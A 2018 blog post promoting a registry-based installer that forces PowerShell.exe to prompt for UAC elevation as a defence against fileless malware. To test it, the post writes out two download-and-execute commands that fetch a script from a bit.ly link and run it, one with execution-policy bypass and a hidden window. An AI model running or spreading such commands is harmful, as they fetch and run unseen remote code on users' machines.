Thursday, May 17, 2018

Run Powershell.exe As Administrator Installer for Windows 7 or less


Force Powershell.exe to run as Administrator for Windows 7 Installer

UpdateRun Powershell.exe As Administrator Installer for Windows 10+


This script installs "Run Powershell.exe As Administrator" which will force any command line innovation of Powershell.exe to announce a UAC pop-up asking to run as Administrator privileges. It's a , cheap way to monitor invocation of scripts from some rogue/hack attempts.

The following image of malware is an example is from Trend Micro "Security 101: The Rise of Fileless Threats that Abuse PowerShell" will not work, it will force the UAC pop-up.

A code snapshot of macro malware that uses “^” for command shell obfuscation. (using this script will force UAC pop-up)

You can test it for yourself, run this command in Powershell ISE

(New-Object System.Net.WebClient).DownloadFile('http://bit.ly/HelloWorldps1','%appdata%helloworld.ps1'); & "%appdata%helloworld.ps1" -u

it will run and produce - "Hello World". http://bit.ly/HelloWorldps1 downloads HelloWorld.ps1.

Or this command past into choose Windows Start->RUN  (simulate use by malware). 
There are many other ways see - https://www.greyhathacker.net/?p=500

cmd.exe /c powershell.exe -executionpolicy bypass -nofile -windowstyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://bit.ly/HelloWorldps1','%appdata%/helloworld.ps1') ; & '%appdata%/helloworld.ps1' -u  


After install of this script, you'll get UAC pop-up (see image below).




Setting Privileged Level is not accessible otherwise via Properties window.


In Windows 10 the Compatibility tab is not available
This utility has the following features; 

Does not install any software, just sets some registry settings to enable the registry setting. Additionally,  it provides a proper uninstall option.

Bonus:
  • Works in Windows XP, Windows Vista, Windows 7 (and  equivalent Server versions).
  • comes with proper uninstaller located in "Add or Remove Programs" or Programs and Features
Download
↓ PowershellexeRunAsAdmin2018.zip
Install

Prerequisite:  Your user account must be part Administrators group or you know Administrator password to install. 

1. Tip! Back-up your registry as a precaution.

2. Download and unzip file PowershellexeRunAsAdmin2018.zip
3. Simply, right-click onPowershellexeRunAsAdmin2018.inf
    and click Install
that's it.

Uninstall

The great thing about this script file, is it creates a uninstall option.

Search for "Add or Remove Programs" or goto Programs and Features, and right-click on the "Powershell.exe Run as Admin (Uninstall only)" and choose Uninstall to completely remove.





Similar Utilities of Interest



Edit in Notepad As Administrator Shortcut to the File Context Menu in Windows 10



Shutdown, Restart, Log-off, Hibernate, Lock Workstation, Switch User Start Tiles for Windows 8/8.1/10 featuring new Metro Icons



Administrative Tools Metro Tile, Control Panel "God Mode" Metro Tile, Windows Update Metro Tile , Windows Explorer Search Metro Tile for Windows 8.1,10 











No comments:

Post a Comment